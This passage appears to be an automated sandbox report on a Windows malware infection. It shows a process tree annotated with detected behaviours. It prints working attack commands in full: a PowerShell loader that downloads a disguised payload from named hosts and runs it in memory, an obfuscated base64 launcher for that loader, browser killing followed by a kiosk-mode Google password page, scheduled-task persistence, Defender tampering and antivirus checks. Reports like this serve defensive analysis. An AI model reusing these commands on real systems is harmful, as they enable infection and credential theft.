C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"9⤵PID:4912
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"9⤵PID:2164
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"9⤵
- System Location Discovery: System Language Discovery
PID:616
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"4⤵
- Executes dropped EXE
PID:2736 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /sc minute /mo 1 /tn MyTask /tr ""C:\Users\Admin\AppData\Roaming\Suh\jdk-21.0.6\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\Suh\niga.jar"" /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:3904
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148390101\8a1e512b60.exe"C:\Users\Admin\AppData\Local\Temp\10148390101\8a1e512b60.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5428 -
C:\Users\Admin\AppData\Local\Temp\SKO53PK432SKFGU9P1PE0JNLPLN.exe"C:\Users\Admin\AppData\Local\Temp\SKO53PK432SKFGU9P1PE0JNLPLN.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5696
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148400101\852937cf9d.exe"C:\Users\Admin\AppData\Local\Temp\10148400101\852937cf9d.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5916
-
-
C:\Users\Admin\AppData\Local\Temp\10148410101\2d911a7926.exe"C:\Users\Admin\AppData\Local\Temp\10148410101\2d911a7926.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4964 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4852 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {357d3ac5-c598-427a-82b8-6b41f5b17848} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" gpu7⤵PID:3380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2456 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07d57306-e3fb-439c-a829-4178539cc335} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" socket7⤵PID:1168
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3068 -childID 1 -isForBrowser -prefsHandle 2972 -prefMapHandle 1316 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c177159e-fec0-4494-a337-c02d85d6af7a} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab7⤵PID:5444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3628 -childID 2 -isForBrowser -prefsHandle 3548 -prefMapHandle 2824 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {138ecba1-b0e4-4038-b919-561344c77199} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab7⤵PID:5568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4784 -prefMapHandle 4780 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f7aefe2-9e10-4557-959c-fbda96bef28b} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" utility7⤵
- Checks processor information in registry
PID:5056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 3 -isForBrowser -prefsHandle 5444 -prefMapHandle 5432 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df8fa119-54d2-420e-9971-98bdbd8c1855} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab7⤵PID:5796
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 4 -isForBrowser -prefsHandle 5612 -prefMapHandle 5200 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {531e4f6c-57a7-4d5c-bcff-d7c8194cdcff} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab7⤵PID:5832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5804 -childID 5 -isForBrowser -prefsHandle 5776 -prefMapHandle 5772 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {74e5c23f-d9a4-4588-8a11-13254559536c} 4852 "\\.\pipe\gecko-crash-server-pipe.4852" tab7⤵PID:5696
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148420101\c04f336cff.exe"C:\Users\Admin\AppData\Local\Temp\10148420101\c04f336cff.exe"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:640 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵
- Checks computer location settings
- Modifies registry class
PID:5260 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵
- Checks computer location settings
PID:5112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5840 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"9⤵
- System Location Discovery: System Language Discovery
PID:3420
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"C:\Users\Admin\AppData\Local\Temp\10148470101\ReK7Ewx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3600 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat5⤵
- System Location Discovery: System Language Discovery
PID:5940 -
C:\Windows\SysWOW64\expand.exeexpand Ae.msi Ae.msi.bat6⤵
- System Location Discovery: System Language Discovery
PID:5220
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵PID:5752
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7899196⤵PID:2700
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Deviation.msi6⤵
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com6⤵PID:2488
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q6⤵
- System Location Discovery: System Language Discovery
PID:432
-
-
C:\Users\Admin\AppData\Local\Temp\789919\Occupation.comOccupation.com q6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5108
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 56⤵
- System Location Discovery: System Language Discovery
PID:4180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"C:\Users\Admin\AppData\Local\Temp\10148480101\yUI6F6C.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10148490101\ADFoyxP.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat5⤵
- System Location Discovery: System Language Discovery
PID:5972 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat6⤵
- System Location Discovery: System Language Discovery
PID:4932
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"6⤵
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"6⤵PID:444
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530906⤵
- System Location Discovery: System Language Discovery
PID:4584
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub6⤵
- System Location Discovery: System Language Discovery
PID:3336
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "posted" Good6⤵
- System Location Discovery: System Language Discovery
PID:2524
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com6⤵PID:4932
-
-
